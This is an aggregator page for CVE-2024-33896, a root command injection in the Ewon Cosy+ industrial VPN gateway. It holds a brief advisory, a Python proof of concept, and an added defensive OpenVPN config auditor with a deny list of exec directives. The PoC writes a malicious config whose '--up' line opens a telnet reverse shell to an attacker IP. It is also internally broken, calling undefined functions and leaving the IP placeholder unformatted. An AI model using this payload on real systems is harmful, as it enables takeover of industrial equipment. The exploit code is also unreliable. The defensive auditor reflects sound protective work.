| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-33896 | 2 Aug 2024 20:42 | – | circl |
| HMS Networks HMS Cosy+ Security Vulnerability | 2 Aug 2024 00:00 | – | cnnvd |
| CVE-2024-33896 | 2 Aug 2024 00:00 | – | cve |
| CVE-2024-33896 | 2 Aug 2024 00:00 | – | cvelist |
| Cosy+ firmware 21.2s7 - Command Injection | 10 Apr 2025 00:00 | – | exploitdb |
| EUVD-2024-31600 | 2 Aug 2024 00:00 | – | euvd |
| CVE-2024-33896 | 2 Aug 2024 18:16 | – | nvd |
| Ewon Cosy+ Command Injection | 19 Aug 2024 00:00 | – | packetstorm |
| PT-2024-25533 · Cosy+ · Cosy+ | 2 Aug 2024 00:00 | – | ptsecurity |
| CVE-2024-33896 | 23 May 2025 07:57 | – | redhatcve |

Hey,

Overview:
The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The manufacturer describes the product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure VPN connection between the machine (PLC, HMI, or other devices) and the remote engineer. The connection happens through Talk2m, a highly secured industrial cloud service. The Ewon Cosy+ makes industrial remote access easy and secure like never before!"

Due to improper neutralization of parameters read from a user-controlled configuration file, an authenticated attacker is able to inject and execute OS commands on the device.

Vulnerability Details:
Authenticated attackers are able to upload a custom OpenVPN configuration. This configuration can contain the OpenVPN parameters "--up" and "--down", which execute a specified script or executable. Since the OpenVPN process itself runs with the highest privileges (root), this allows the device to be completely compromised.

PoC:
```python
# Exploit Title: Ewon Cosy+ Command Injection
# Google Dork: N/A
# Date: 2024-8-20
# Exploit Author: CodeB0ss
# Contact: t.me/codeb0ss / [email protected]
# Version: 21.2s7
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-33896
import socket
import subprocess
import time


def configcreator(file_path):
    with open(file_path, 'w') as f:
        f.write("""
client
dev tun
persist-tun
proto tcp
verb 5
mute 20
--up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"'
script-security 2
""")


def l3st(port):
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind(('0.0.0.0', port))
    server_socket.listen(1)
    print(f" - --> Listening_0n_port {port}")
    client_socket, _ = server_socket.accept()
    print(" - --> Recevied")
    while True:
        data = client_socket.recv(1024)
        if not data:
            break
        print(data.decode())
    client_socket.close()
    server_socket.close()


if __name__ == "__main__":
    IP = '127.0.0.1'
    config = '/path/to/malicious_config.ovpn'
    port = 5000
    listener_process = subprocess.Popen(['python', '-c', f'from __main__ import start_listener; start_listener({port})'])
    time.sleep(2)
    create_malicious_openvpn_config(config)
    print(f" - --> config_created {config}")
```
GitHub:
https://github.com/codeb0ss/CVE-2024-33896-PoCData
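
A defensive check for the upload path described under Vulnerability Details, as an added example that is not part of the original advisory or the vendor's firmware: it flags OpenVPN directives that run external programs before an uploaded configuration is accepted. The function name `audit_ovpn`, the directive list and the sample configuration are assumptions constructed for illustration.

```python
import re

# OpenVPN directives that run an external program or load a plugin.
EXEC_DIRECTIVES = {
    "up", "down", "ipchange", "route-up", "route-pre-down", "tls-verify",
    "auth-user-pass-verify", "client-connect", "client-disconnect",
    "learn-address", "plugin",
}

def audit_ovpn(text):
    """Return (line_no, directive, reason) findings for an uploaded config."""
    findings = []
    inline_tag = None  # inside <ca>...</ca> style blocks, lines are data
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if inline_tag:
            if line == f"</{inline_tag}>":
                inline_tag = None
            continue
        opened = re.fullmatch(r"<([A-Za-z0-9-]+)>", line)
        if opened and opened.group(1) != "connection":  # that block holds options
            inline_tag = opened.group(1)
            continue
        if not line or line[0] in "#;":  # blank line or comment
            continue
        parts = line.split()
        name = parts[0].lstrip("-").lower()  # tolerate CLI-style "--up"
        if name in EXEC_DIRECTIVES:
            findings.append((line_no, name, "runs an external command or plugin"))
        elif name == "script-security" and parts[1:2] not in (["0"], ["1"]):
            findings.append((line_no, name, "level is not 0 or 1"))
    return findings

# Constructed sample upload using the directives named in the advisory.
SAMPLE = """client
dev tun
<ca>
up this-line-is-certificate-data
</ca>
; down /tmp/commented-out
--up /tmp/placeholder.sh
script-security 2
"""

if __name__ == "__main__":
    for finding in audit_ovpn(SAMPLE):
        print(finding)
```

Rejecting any upload with a non-empty result is a deny-list control; running the OpenVPN process without root privileges limits the impact if a directive is missed.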